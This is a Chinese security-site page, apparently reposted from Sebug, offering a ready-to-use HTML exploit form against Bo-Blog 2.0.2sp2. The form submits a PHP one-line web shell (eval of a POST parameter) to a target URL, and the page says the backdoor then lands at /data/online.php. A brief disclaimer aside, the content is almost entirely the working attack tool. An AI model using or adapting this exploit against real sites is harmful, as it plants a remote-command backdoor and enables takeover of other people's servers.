首页 网络安全 安全学院 查看内容

BO-BLOG漏洞提交1句话马工具[html]

2009-2-4 03:28 601 0

摘要: 所属类型:Web Apps 以下程序(方法)可能带有攻击性,仅供安全研究与教学之用.风险自负!代码 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 T...
关键词: 之用 攻击性 一句话 所属 风险 以下 类型 代码 地址 程序

所属类型:Web Apps 以下程序(方法)可能带有攻击性,仅供安全研究与教学之用.风险自负!代码 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"><HTML><HEAD><TITLE>The Csript For The "<?php eval($_POST[cmd])?>" </TITLE><META http-equiv=Content-Type content="text/html; charset=gb2312"><META content="MSHTML 6.00.2800.1479" name=GENERATOR></HEAD><BODY style="FONT-SIZE: 9pt">--------------------------------- Exp of Bo-BlogV2.0.2sp2--------------------------------- <br><FORM name=frm method=post target=_blank>Url: <INPUT style="BORDER-RIGHT: 1px solid; BORDER-TOP: 1px solid; FONT-SIZE: 9pt; BORDER-LEFT: 1px solid; BORDER-BOTTOM: 1px solid" size=34 value=http://www.bo-blog.com/ name=act> shell: <INPUT style="BORDER-RIGHT: 1px solid; BORDER-TOP: 1px solid; FONT-SIZE: 9pt; BORDER-LEFT: 1px solid; BORDER-BOTTOM: 1px solid" size=30 value="&lt;?php eval($_POST[cmd]);?&gt;" name=nowonline[]> <INPUT onclick="Javascipt:action=document.all.act.value;frm.submit();" type=button value="提 交" name=Send></FORM><br>----------------------- 提交后,一句话马地址是 /data/online.php ---------------------------- </BODY></HTML>//Sebug.net
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系 [邮箱地址] 删除

路过

雷人

握手

鲜花

鸡蛋

最新评论

返回顶部